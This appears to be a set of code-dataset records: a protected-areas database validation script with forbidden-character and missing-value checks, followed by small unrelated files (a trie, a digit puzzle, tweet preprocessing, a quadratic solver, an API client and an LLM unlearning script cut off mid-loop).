This function is the foundation of the others.\n    \n    This function checks the WDPA for forbidden characters and returns a list of WDPA_PIDs \n    that have invalid values for the specified field(s).\n\n    Return True if forbidden characters (specified below) are found in the DataFrame\n\n    Return list of WDPA_PIDs where forbidden characters occur, if \n    return_pid is set True\n\n    ## Arguments ##\n    check_field -- string of the field to check for forbidden characters\n    \n    ## Example ##\n    forbidden_character(\n        wdpa_df,\n        check_field=\"DESIG_ENG\",\n        return_pid=True)\n    '''\n\n    # Define the forbidden characters and escape them for use in a regex pattern\n    # (re is expected to be imported at the top of this script)\n    forbidden_characters = ['<','>','?','*','\\r','\\n']\n    forbidden_characters_esc = [re.escape(s) for s in forbidden_characters]\n\n    pattern = '|'.join(forbidden_characters_esc)\n\n    # Obtain the WDPA_PIDs with forbidden characters.\n    # Drop records where check_field is NaN first, so .str.contains cannot return NA;\n    # note a bare dropna() would also discard rows with NaN in unrelated fields.\n    wdpa_df = wdpa_df.dropna(subset=[check_field])\n    invalid_wdpa_pid = wdpa_df[wdpa_df[check_field].str.contains(pattern, case=False)]['WDPA_PID'].values\n\n    if return_pid:\n        return invalid_wdpa_pid\n    \n    return len(invalid_wdpa_pid) > 0\n\n#### Input functions ####\n\n#########################################\n#### 6.1. Forbidden character - NAME ####\n#########################################\n\ndef forbidden_character_name(wdpa_df, return_pid=False):\n    '''\n    Capture forbidden characters in the field 'NAME'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing forbidden characters in field 'NAME'\n    '''\n\n    check_field = 'NAME'\n\n    return forbidden_character(wdpa_df, check_field, return_pid)\n\n##############################################\n#### 6.2. Forbidden character - ORIG_NAME ####\n##############################################\n\ndef forbidden_character_orig_name(wdpa_df, return_pid=False):\n    '''\n    Capture forbidden characters in the field 'ORIG_NAME'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing forbidden characters in field 'ORIG_NAME'\n    '''\n\n    check_field = 'ORIG_NAME'\n\n    return forbidden_character(wdpa_df, check_field, return_pid)\n\n##########################################\n#### 6.3. Forbidden character - DESIG ####\n##########################################\n\ndef forbidden_character_desig(wdpa_df, return_pid=False):\n    '''\n    Capture forbidden characters in the field 'DESIG'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing forbidden characters in field 'DESIG'\n    '''\n\n    check_field = 'DESIG'\n\n    return forbidden_character(wdpa_df, check_field, return_pid)\n\n##############################################\n#### 6.4. Forbidden character - DESIG_ENG ####\n##############################################\n\ndef forbidden_character_desig_eng(wdpa_df, return_pid=False):\n    '''\n    Capture forbidden characters in the field 'DESIG_ENG'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing forbidden characters in field 'DESIG_ENG'\n    '''\n\n    check_field = 'DESIG_ENG'\n\n    return forbidden_character(wdpa_df, check_field, return_pid)\n
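\n# --- Worked example (illustrative; not part of the original QA suite) ---\n# The escaped pattern built above matches any of < > ? * plus carriage\n# returns and line feeds anywhere in a value. The helper below is\n# hypothetical; it rebuilds the same pattern (re is already relied on by\n# forbidden_character above) so it can be tried on a single string.\ndef _example_forbidden_pattern():\n    '''Hypothetical helper: compile the forbidden-character regex used above.'''\n    forbidden_characters = ['<','>','?','*','\\r','\\n']\n    return re.compile('|'.join(re.escape(s) for s in forbidden_characters))\n# e.g. bool(_example_forbidden_pattern().search('Parc <National>')) is True.\n\n##############################################\n#### 6.5.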
Forbidden character - MANG_AUTH ####\n##############################################\n\ndef forbidden_character_mang_auth(wdpa_df, return_pid=False):\n    '''\n    Capture forbidden characters in the field 'MANG_AUTH'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing forbidden characters in field 'MANG_AUTH'\n    '''\n\n    check_field = 'MANG_AUTH'\n\n    return forbidden_character(wdpa_df, check_field, return_pid)\n\n##############################################\n#### 6.6. Forbidden character - MANG_PLAN ####\n##############################################\n\ndef forbidden_character_mang_plan(wdpa_df, return_pid=False):\n    '''\n    Capture forbidden characters in the field 'MANG_PLAN'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing forbidden characters in field 'MANG_PLAN'\n    '''\n\n    check_field = 'MANG_PLAN'\n\n    return forbidden_character(wdpa_df, check_field, return_pid)\n\n############################################\n#### 6.7. Forbidden character - SUB_LOC ####\n############################################\n\ndef forbidden_character_sub_loc(wdpa_df, return_pid=False):\n    '''\n    Capture forbidden characters in the field 'SUB_LOC'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing forbidden characters in field 'SUB_LOC'\n    '''\n\n    check_field = 'SUB_LOC'\n\n    return forbidden_character(wdpa_df, check_field, return_pid)\n\n########################\n#### 7. NaN present ####\n########################\n\n#### Factory Function ####\n\ndef nan_present(wdpa_df, check_field, return_pid=False):\n    '''\n    Factory Function: this generic function is to be linked to\n    the family of 'nan_present' input functions stated below. These latter \n    functions are to give information on which fields to check and pull \n    from the DataFrame. This function is the foundation of the others.\n    \n    This function checks the WDPA for NaN / NA / None values and returns \n    a list of WDPA_PIDs that have invalid values for the specified field(s).\n\n    Return True if NaN / NA values are found in the DataFrame\n\n    Return list of WDPA_PIDs where NaN / NA values occur, if \n    return_pid is set True\n\n    ## Arguments ##\n    check_field -- string of field to be checked for NaN / NA values\n    \n    ## Example ##\n    nan_present(\n        wdpa_df,\n        check_field=\"DESIG_ENG\",\n        return_pid=True)\n    '''\n\n    invalid_wdpa_pid = wdpa_df[pd.isna(wdpa_df[check_field])]['WDPA_PID'].values\n\n    if return_pid:\n        return invalid_wdpa_pid\n    \n    return len(invalid_wdpa_pid) > 0\n\n#### Input functions ####\n\n#################################\n#### 7.1. NaN present - NAME ####\n#################################\n\ndef nan_present_name(wdpa_df, return_pid=False):\n    '''\n    Capture NaN / NA in the field 'NAME'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing NaN / NA in field 'NAME'\n    '''\n\n    check_field = 'NAME'\n\n    return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.2. NaN present - ORIG_NAME ####\n######################################\n\ndef nan_present_orig_name(wdpa_df, return_pid=False):\n    '''\n    Capture NaN / NA in the field 'ORIG_NAME'\n    \n    Input: WDPA in pandas DataFrame \n    Output: list with WDPA_PIDs containing NaN / NA in field 'ORIG_NAME'\n    '''\n\n    check_field = 'ORIG_NAME'\n\n    return nan_present(wdpa_df, check_field, return_pid)\n
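\n# --- Worked example (illustrative; not part of the original QA suite) ---\n# pd.isna() used above flags None and np.nan alike, so the same check works\n# for text and numeric columns. The helper below is hypothetical and assumes\n# the module-level pandas/numpy imports this script already relies on.\ndef _example_nan_semantics():\n    '''Hypothetical helper: show which values pd.isna() flags.'''\n    sample = pd.Series(['Reserve A', None, np.nan])\n    return pd.isna(sample).tolist()  # [False, True, True]\n\n##################################\n#### 7.3.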
NaN present - DESIG ####\n##################################\n\ndef nan_present_desig(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'DESIG'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'DESIG'\n '''\n\n check_field = 'DESIG'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.4. NaN present - DESIG_ENG ####\n######################################\n\ndef nan_present_desig_eng(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'DESIG_ENG'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'DESIG_ENG'\n '''\n\n check_field = 'DESIG_ENG'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.5. NaN present - MANG_AUTH ####\n######################################\n\ndef nan_present_mang_auth(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'MANG_AUTH'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'MANG_AUTH'\n '''\n\n check_field = 'MANG_AUTH'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n######################################\n#### 7.6. NaN present - MANG_PLAN ####\n######################################\n\ndef nan_present_mang_plan(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'MANG_PLAN'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'MANG_PLAN'\n '''\n\n check_field = 'MANG_PLAN'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n####################################\n#### 7.7. NaN present - SUB_LOC ####\n####################################\n\ndef nan_present_sub_loc(wdpa_df, return_pid=False):\n '''\n Capture NaN / NA in the field 'SUB_LOC'\n \n Input: WDPA in pandas DataFrame \n Output: list with WDPA_PIDs containing NaN / NA in field 'SUB_LOC'\n '''\n\n check_field = 'SUB_LOC'\n\n return nan_present(wdpa_df, check_field, return_pid)\n\n\n\n#################################################################\n#### 8. METADATAID: WDPA and Source Table (on the Wish List) ####\n#################################################################\n\n#######################################################################\n#### 8.1. Invalid: METADATAID present in WDPA, not in Source Table ####\n#######################################################################\n\n# def invalid_metadataid_not_in_source_table(wdpa_df, wdpa_source, return_pid=False):\n# '''\n# Return True if METADATAID is present in the WDPA but not in the Source Table\n# Return list of WDPA_PIDs for which the METADATAID is not present in the Source Table\n# '''\n \n# field = 'METADATAID'\n\n ########## OPTIONAL ##########\n #### Remove METADATAID = 840 (Russian sites that are restricted and not in Source Table) \n #condition_crit = [840]\n # Remove METADATAID = 840 from the WDPA\n #wdpa_df_no840 = wdpa_df[wdpa_df[field[0]] != condition_crit[0]]\n #invalid_wdpa_pid = wdpa_df_no840[~wdpa_df_no840[field[0]].isin(\n # wdpa_source[field[0]].values)]['WDPA_PID'].values\n ##############################\n\n # Find invalid WDPA_PIDs\n# invalid_wdpa_pid = wdpa_df[~wdpa_df[field].isin(\n# wdpa_source[field].values)]['WDPA_PID'].values\n \n# if return_pid:\n# return invalid_wdpa_pid\n\n# return invalid_wdpa_pid > 0\n\n#######################################################################\n#### 8.2. 
Invalid: METADATAID present in Source Table, not in WDPA ####\n#### Note: output is METADATAIDs. ####\n#######################################################################\n\n# def invalid_metadataid_not_in_wdpa(wdpa_df, wdpa_point, wdpa_source, return_pid=False):\n# '''\n# Return True if METADATAID is present in the Source Table but not in the Source Table\n# Return list of METADATAIDs for which the METADATAID is not present in the Source Table\n# '''\n \n# field = ['METADATAID']\n\n# # Concatenate all METADATAIDs of the WDPA point and poly tables\n# field_allowed_values = np.concatenate((wdpa_df[field[0]].values,wdpa_point[field[0]].values),axis=0)\n\n# ########## OPTIONAL ##########\n# # Remove METADATA = 840 (Russian sites that are restricted and not in Source Table)\n# #metadataid_wdpa = np.concatenate((wdpa_df[field[0]].values,wdpa_point[field[0]].values),axis=0)\n# #field_allowed_values = np.delete(metadataid_wdpa, np.where(metadataid_wdpa == 840), axis=0)\n# #######################\n \n# # Find METADATAIDs in the Source Table that are not present in the WDPA\n# invalid_metadataid = wdpa_source[~wdpa_source[field[0]].isin(field_allowed_values)]['METADATAID'].values\n \n# if return_pid:\n# return invalid_metadataid\n \n# return len(invalid_metadataid) > 0\n\n############################################################################################\n#### Below is a dictionary that holds all checks' descriptive (as displayed in Excel) ####\n#### and script function names (as displayed in this script, qa.py). ####\n#### These checks are subsequently called by the main functions, poly.py and point.py, ####\n#### to run all checks on the WDPA input feature class attribute table. ####\n############################################################################################\n\n# Checks to be run for both point and polygon data\ncore_checks = [\n{'name': 'duplicate_wdpa_pid', 'func': duplicate_wdpa_pid},\n{'name': 'tiny_rep_area', 'func': area_invalid_rep_area},\n{'name': 'zero_rep_m_area_marine12', 'func': area_invalid_rep_m_area_marine12},\n{'name': 'ivd_rep_m_area_gt_rep_area', 'func': area_invalid_rep_m_area_rep_area},\n{'name': 'ivd_no_tk_area_gt_rep_m_area', 'func': area_invalid_no_tk_area_rep_m_area},\n{'name': 'ivd_no_tk_area_rep_m_area', 'func': invalid_no_take_no_tk_area_rep_m_area},\n{'name': 'ivd_int_crit_desig_eng_other', 'func': invalid_int_crit_desig_eng_other},\n{'name': 'ivd_desig_eng_iucn_cat_other', 'func': invalid_desig_eng_iucn_cat_other},\n{'name': 'dif_name_same_id', 'func': inconsistent_name_same_wdpaid},\n{'name': 'dif_orig_name_same_id', 'func': inconsistent_orig_name_same_wdpaid},\n{'name': 'ivd_dif_desig_same_id', 'func': inconsistent_desig_same_wdpaid},\n{'name': 'ivd_dif_desig_eng_same_id', 'func': inconsistent_desig_eng_same_wdpaid},\n{'name': 'dif_desig_type_same_id', 'func': inconsistent_desig_type_same_wdpaid},\n{'name': 'dif_int_crit_same_id', 'func': inconsistent_int_crit_same_wdpaid},\n{'name': 'dif_no_take_same_id', 'func': inconsistent_no_take_same_wdpaid},\n{'name': 'dif_status_same_id', 'func': inconsistent_status_same_wdpaid},\n{'name': 'dif_status_yr_same_id', 'func': inconsistent_status_yr_same_wdpaid},\n{'name': 'dif_gov_type_same_id', 'func': inconsistent_gov_type_same_wdpaid},\n{'name': 'dif_own_type_same_id', 'func': inconsistent_own_type_same_wdpaid},\n{'name': 'dif_mang_auth_same_id', 'func': inconsistent_mang_auth_same_wdpaid},\n{'name': 'dif_mang_plan_same_id', 'func': inconsistent_mang_plan_same_wdpaid},\n{'name': 
'ivd_dif_verif_same_id', 'func': inconsistent_verif_same_wdpaid},\n{'name': 'ivd_dif_metadataid_same_id', 'func': inconsistent_metadataid_same_wdpaid},\n{'name': 'ivd_dif_sub_loc_same_id', 'func': inconsistent_sub_loc_same_wdpaid},\n{'name': 'ivd_dif_parent_iso3_same_id', 'func': inconsistent_parent_iso3_same_wdpaid},\n{'name': 'ivd_dif_iso3_same_id', 'func': inconsistent_iso3_same_wdpaid},\n{'name': 'ivd_pa_def', 'func': invalid_pa_def},\n{'name': 'ivd_desig_eng_international', 'func': invalid_desig_eng_international},\n{'name': 'ivd_desig_type_international', 'func': invalid_desig_type_international},\n{'name': 'ivd_desig_eng_regional', 'func': invalid_desig_eng_regional},\n{'name': 'ivd_desig_type_regional', 'func': invalid_desig_type_regional},\n{'name': 'ivd_int_crit', 'func': invalid_int_crit_desig_eng_ramsar_whs},\n{'name': 'ivd_desig_type', 'func': invalid_desig_type},\n{'name': 'ivd_iucn_cat', 'func': invalid_iucn_cat},\n{'name': 'ivd_iucn_cat_unesco_whs', 'func': invalid_iucn_cat_unesco_whs},\n{'name': 'ivd_marine', 'func': invalid_marine},\n{'name': 'check_no_take_marine0', 'func': invalid_no_take_marine0},\n{'name': 'ivd_no_take_marine12', 'func': invalid_no_take_marine12},\n{'name': 'check_no_tk_area_marine0', 'func': invalid_no_tk_area_marine0},\n{'name': 'ivd_no_tk_area_no_take', 'func': invalid_no_tk_area_no_take},\n{'name': 'ivd_status', 'func': invalid_status},\n{'name': 'ivd_status_yr', 'func': invalid_status_yr},\n{'name': 'ivd_gov_type', 'func': invalid_gov_type},\n{'name': 'ivd_own_type', 'func': invalid_own_type},\n{'name': 'ivd_verif', 'func': invalid_verif},\n{'name': 'check_parent_iso3', 'func': invalid_parent_iso3},\n{'name': 'check_iso3', 'func': invalid_iso3},\n{'name': 'ivd_status_desig_type', 'func': invalid_status_desig_type},\n{'name': 'ivd_character_name', 'func': forbidden_character_name},\n{'name': 'ivd_character_orig_name', 'func': forbidden_character_orig_name},\n{'name': 'ivd_character_desig', 'func': forbidden_character_desig},\n{'name': 'ivd_character_desig_eng', 'func': forbidden_character_desig_eng},\n{'name': 'ivd_character_mang_auth', 'func': forbidden_character_mang_auth},\n{'name': 'ivd_character_mang_plan', 'func': forbidden_character_mang_plan},\n{'name': 'ivd_character_sub_loc', 'func': forbidden_character_sub_loc},\n{'name': 'nan_present_name', 'func': nan_present_name},\n{'name': 'nan_present_orig_name', 'func': nan_present_orig_name},\n{'name': 'nan_present_desig', 'func': nan_present_desig},\n{'name': 'nan_present_desig_eng', 'func': nan_present_desig_eng},\n{'name': 'nan_present_mang_auth', 'func': nan_present_mang_auth},\n{'name': 'nan_present_mang_plan', 'func': nan_present_mang_plan},\n{'name': 'nan_present_sub_loc', 'func': nan_present_sub_loc},]\n\n# Checks to be run for polygon data only (includes GIS_AREA and/or GIS_M_AREA)\narea_checks = [\n{'name': 'gis_area_gt_rep_area', 'func': area_invalid_too_large_gis},\n{'name': 'rep_area_gt_gis_area', 'func': area_invalid_too_large_rep},\n{'name': 'gis_m_area_gt_rep_m_area', 'func': area_invalid_too_large_gis_m},\n{'name': 'rep_m_area_gt_gis_m_area', 'func': area_invalid_too_large_rep_m},\n{'name': 'tiny_gis_area', 'func': area_invalid_gis_area},\n{'name': 'no_tk_area_gt_gis_m_area', 'func': area_invalid_no_tk_area_gis_m_area},\n{'name': 'ivd_gis_m_area_gt_gis_area', 'func': area_invalid_gis_m_area_gis_area},\n{'name': 'zero_gis_m_area_marine12', 'func': area_invalid_gis_m_area_marine12},\n{'name': 'ivd_marine_designation', 'func': area_invalid_marine},]\n\n# Checks for 
polygons\npoly_checks = core_checks + area_checks\n\n# Checks for points (area checks excluded)\npt_checks = core_checks\n\n#######################\n#### END OF SCRIPT ####\n#######################","repo_name":"Yichuans/wdpa-qa","sub_path":"wdpa/qa.py","file_name":"qa.py","file_ext":"py","file_size_in_byte":75438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"620783964","text":"class Trie:\n\n    def __init__(self, val=None):\n        \"\"\"\n        Initialize your data structure here.\n        \"\"\"\n        self.val = val  # stored so __repr__ below does not raise AttributeError\n        self.children = {}\n\n    def insert(self, word: str) -> None:\n        \"\"\"\n        Inserts a word into the trie.\n        \"\"\"\n        node = self.children\n        for w in word:\n            node.setdefault(w, {})\n            node = node.get(w)\n        node['is_end'] = True\n\n    def search(self, word: str) -> bool:\n        \"\"\"\n        Returns if the word is in the trie.\n        \"\"\"\n        node = self.children\n        for w in word:\n            if w not in node:\n                return False\n            node = node.get(w, {})\n        if node.get('is_end', False):\n            return True\n        return False\n\n    def startsWith(self, prefix: str) -> bool:\n        \"\"\"\n        Returns if there is any word in the trie that starts with the given prefix.\n        \"\"\"\n        node = self.children\n        for w in prefix:\n            if w not in node:\n                return False\n            node = node.get(w, {})\n        return True\n\n    def __repr__(self):\n        return str(self.val)\n\n\nif __name__ == '__main__':\n    obj = Trie()\n    obj.insert('apple')\n    obj.insert('bad')\n    obj.insert('bottle')\n    obj.insert('boot')\n    obj.insert('applc')\n    param_2 = obj.search('apple')\n    param_3 = obj.startsWith('app')\n    param_4 = obj.search('app')\n    obj.insert('app')\n    param_5 = obj.search('app')\n\n    print(param_2, param_3, param_4, param_5)\n","repo_name":"jacsice/leetcode","sub_path":"208-implement-trie-prefix-tree.py","file_name":"208-implement-trie-prefix-tree.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"71788879274","text":"#!/usr/bin/env python3\n\ninp = input()\n\n\ndef isBeautiful(n: str):\n    # a number is 'beautiful' here when all of its digits are distinct\n    arr = list(n.replace(\" \", \"\"))  # remove possible spaces from the input and convert it to a list of digit characters\n    while arr:\n        x = arr.pop()\n        if x in arr:\n            return False\n    return True\n\ndef nextBeautiful(n: str):\n    # print the first number greater than n whose digits are all distinct\n    for i in range(int(n)+1, 10000):\n        if isBeautiful(str(i)):\n            print(i)\n            break\n\n\nnextBeautiful(inp)\n","repo_name":"Zeus-HackOlympus/CP","sub_path":"codeforces/beautiful_year.py","file_name":"beautiful_year.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"1165328740","text":"# Preprocessing code to get initial data view and exploration of the train.csv file\n# This is specifically for the Kaggle Twitter sentiment analysis project, but can be adapted for any dataset.\n# by svadivazhagu, May 2020\n\nimport re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\n\n#Load the data in\ndef loadData(fp=\"../test.csv\"):\n    train = pd.read_csv(fp)\n    return train\n\n#Text-based information about the dataset\ndef dataStats(train):\n    #Get an example viewing of what some of the data looks like + num columns\n    #(print is needed outside a notebook, otherwise the expression result is discarded)\n    print(train.head())\n\n    #Show how many samples there are as well as num attributes\n    print(f'{train.shape[0]} tweets, with {train.shape[1]} attributes')\n\n    #Show how many tweets exist per sentiment category\n
train['sentiment'].value_counts()\n\n #Average the length of the tweets for each category\n neutral, positive, negative = int((train.loc[train['sentiment'] == 'neutral'])['text'].str.len().mean()), \\\n int((train.loc[train['sentiment'] == 'positive'])['text'].str.len().mean()),\\\n int((train.loc[train['sentiment'] == 'negative'])['text'].str.len().mean())\n\n print(f' On average, {neutral} chars. per neutral tweet, {positive} per positive, and {negative} per negative')\n\ndef visualStats(train):\n\n #count tweets per sentiment category\n plt.figure(figsize=(7,5))\n plt.title('Tweets per sentiment category')\n sns.countplot(train['sentiment'])\n plt.show()\n\n #check the distribution of each category's tweet length\n neutral = train[train['sentiment'] == 'neutral']['text'].apply(lambda x: len(str(x)))\n positive = train[train['sentiment'] == 'positive']['text'].apply(lambda x: len(str(x)))\n negative = train[train['sentiment'] == 'negative']['text'].apply(lambda x: len(str(x)))\n fig, ax = plt.subplots()\n sns.distplot(neutral, ax=ax, color='green')\n sns.distplot(positive, ax=ax, color='blue')\n sns.distplot(negative, ax=ax, color='red')\n plt.title('Length of tweet based on sentiment')\n plt.legend(['neutral', 'positive', 'negative'])\n plt.show()\n\ndef cleanText(tweet):\n #list of emoji patterns appearing in the tweets to be removed\n emoji_pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n text = str(tweet)\n # Remove emojis\n text = emoji_pattern.sub(r'', text)\n # Remove twitter handles (@___)\n text = re.sub(r'@\\w+', '', text)\n # Remove links after research that t.co uses http still\n text = re.sub(r'http.?://[^/s]+[/s]?', '', text)\n return text.strip().lower()\n\n\ndef wordcloud(train, text='text'):\n # Join all tweets in one string\n corpus = \" \".join(str(review) for review in train[text])\n print(f\"There are {len(corpus)} words used.\")\n\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n background_color=\"white\").generate(corpus)\n\n plt.figure(figsize=(30, 30))\n plt.imshow(wordcloud, interpolation=\"bilinear\")\n plt.axis(\"off\")\n plt.show()\n\nif __name__ == '__main__':\n train = loadData()\n dataStats(train)\n visualStats(train)\n\n train['text'] = train['text'].apply(lambda x: cleanText(x))\n\n #Check the most common words across the cleaned tweets\n wordcloud(train=train, text = 'text')","repo_name":"svadivazhagu/Tweet-Sentiment-Extraction","sub_path":"Preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5859768878","text":"import math\n\n[a,b,g] = input(\"Παρακαλώ εισάγετε τιμές α,β,γ (χωρισμένες με κόμμα):\").split(',')\na = int(a)\nb = int(b)\ng = int(g)\n\ndelta = b*b-4*a*g\n\nif delta > 0:\n delta = math.sqrt(delta)\n x1 = (-b+delta)/(2*a)\n x2 = (-b-delta)/(2*a)\n print(\"Οι 2 πραγματικές ρίζες είναι:\",x1,x2)\nelif delta == 0:\n delta = math.sqrt(delta)\n x1 = (-b)/(2*a)\n print(\"Η μια πραγματική και διπλή ριζα είναι:\",x1)\nelse:\n print(\"Δεν υπάρχουν πραγματικές 
ρίζες\")\n","repo_name":"AndreasTsoumanis/Python-Coursity","sub_path":"Coursityex2.1.py","file_name":"Coursityex2.1.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38654949516","text":"from client.api.base_class import BaseAPIClass\nfrom config import ConfigClass\n\n\nclass ProjectUsersApis(BaseAPIClass):\n def list_users(self, project_geid):\n\n url = ConfigClass.project_list_user_url % project_geid\n res = self._send_request(url, method='GET')\n\n return res.json().get('result', {})\n\n def update_user_role(self, project_geid, username, old_role, new_role):\n\n payload = {\n 'old_role': old_role,\n 'new_role': new_role,\n }\n\n url = ConfigClass.project_user_ops_url % (project_geid, username)\n res = self._send_request(url, method='PUT', json=payload)\n\n return res.json().get('result', {})\n","repo_name":"BrainModes/sdk","sub_path":"client/api/project_users.py","file_name":"project_users.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37602250388","text":"import os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nfrom typing import Dict, Optional, Sequence\nfrom peft import (\n get_peft_model,\n)\nfrom datasets import load_dataset\nfrom dataclasses import dataclass, field\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport argparse\n\nimport torch\nimport transformers\n\nimport LLMIF as llmif\nfrom LLMIF import get_model, get_tokenizer, get_model_tokenizer\nfrom LLMIF import TrainDataset, TestDataset\nfrom LLMIF import Unlearner\nfrom LLMIF.data_loader import IGNORE_INDEX \nfrom LLMIF.unlearning import UnlearningArguments\n\nCONFIG_PATH = \"/home/hl3352/LLMs/LLMsInfluenceFunc/configs/config_test.json\"\n\n\ndef smart_tokenizer_and_embedding_resize(\n special_tokens_dict: Dict,\n tokenizer: transformers.PreTrainedTokenizer,\n model: transformers.PreTrainedModel,\n):\n \"\"\"Resize tokenizer and embedding.\n\n Note: This is the unoptimized version that may make your embedding size not be divisible by 64.\n \"\"\"\n num_new_tokens = tokenizer.add_special_tokens(special_tokens_dict)\n model.resize_token_embeddings(len(tokenizer))\n\n if num_new_tokens > 0:\n input_embeddings = model.get_input_embeddings().weight.data\n output_embeddings = model.get_output_embeddings().weight.data\n\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\n\n\n@dataclass\nclass DataCollatorForSupervisedDataset(object):\n \"\"\"Collate examples for supervised fine-tuning.\"\"\"\n\n tokenizer: transformers.PreTrainedTokenizer\n\n def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]:\n input_ids = tuple([instance[0] for instance in instances])\n labels = tuple([instance[1] for instance in instances])\n input_ids = torch.nn.utils.rnn.pad_sequence(\n input_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id\n )\n labels = torch.nn.utils.rnn.pad_sequence(labels, batch_first=True, padding_value=IGNORE_INDEX)\n return dict(\n input_ids=input_ids,\n labels=labels,\n attention_mask=input_ids.ne(self.tokenizer.pad_token_id),\n )\n\n\ndef make_supervised_data_module(tokenizer: transformers.PreTrainedTokenizer, config) -> Dict:\n 
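# English rendering of Coursityex2.1.py above, whose prompts are Greek
# ("Please enter values a,b,c (comma separated)", "The 2 real roots are",
# "The one real, double root is", "There are no real roots"). A compact
# equivalent sketch of the same discriminant logic:
import math

a, b, c = (int(v) for v in input("Enter a,b,c (comma separated): ").split(','))
d = b * b - 4 * a * c                    # discriminant
if d > 0:
    r = math.sqrt(d)
    print("Two real roots:", (-b + r) / (2 * a), (-b - r) / (2 * a))
elif d == 0:
    print("One (double) real root:", -b / (2 * a))
else:
    print("There are no real roots")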
\"\"\"Make dataset and collator for supervised fine-tuning.\"\"\"\n # train_dataset = SupervisedDataset(tokenizer=tokenizer, data_path=data_args.data_path)\n train_dataset = TrainDataset(config['train_data_path'], tokenizer)\n unlearn_dataset = TestDataset(config['unlearn_data_path'], tokenizer)\n data_collator = DataCollatorForSupervisedDataset(tokenizer=tokenizer)\n return dict(train_dataset=train_dataset, unlearn_dataset=unlearn_dataset, eval_dataset=None, data_collator=data_collator)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config_path', default=CONFIG_PATH, type=str)\n args = parser.parse_args()\n config_path = args.config_path\n\n llmif.init_logging()\n config = llmif.get_config(config_path)\n model_config = config['model']\n print(config)\n\n parser = transformers.HfArgumentParser((UnlearningArguments))\n unlearning_args, = parser.parse_dict(config['unlearning'], allow_extra_keys=True)\n print(unlearning_args)\n\n model, tokenizer = get_model_tokenizer(model_config)\n\n special_tokens_dict = dict()\n if tokenizer.pad_token is None:\n special_tokens_dict[\"pad_token\"] = DEFAULT_PAD_TOKEN\n if tokenizer.eos_token is None:\n special_tokens_dict[\"eos_token\"] = DEFAULT_EOS_TOKEN\n if tokenizer.bos_token is None:\n special_tokens_dict[\"bos_token\"] = DEFAULT_BOS_TOKEN\n if tokenizer.unk_token is None:\n special_tokens_dict[\"unk_token\"] = DEFAULT_UNK_TOKEN\n\n smart_tokenizer_and_embedding_resize(\n special_tokens_dict=special_tokens_dict,\n tokenizer=tokenizer,\n model=model,\n )\n\n\n# if torch.__version__ >= \"2\":\n# model = torch.compile(model)\n\n data_module = make_supervised_data_module(tokenizer=tokenizer, config=config[\"data\"])\n unlearner = Unlearner(model=model, tokenizer=tokenizer, args=unlearning_args, **data_module)\n turns_num = 0\n while True:\n print(\"-----\" * 20)\n print(f\"impair and repair turn: {turns_num}\")\n print(\"before impair\")\n unlearner.impair()\n print(\"before repair\")\n unlearner.repair()\n\n unlearner.save_state()\n unlearner.save_model(output_dir=unlearning_args.output_dir + f\"/{turns_num}\")\n turns_num += 1\n\n if turns_num >= 200:\n break\n\n# if unlearner.unlearn_callback.probs < unlearning_args.impair_break_threshold:\n# 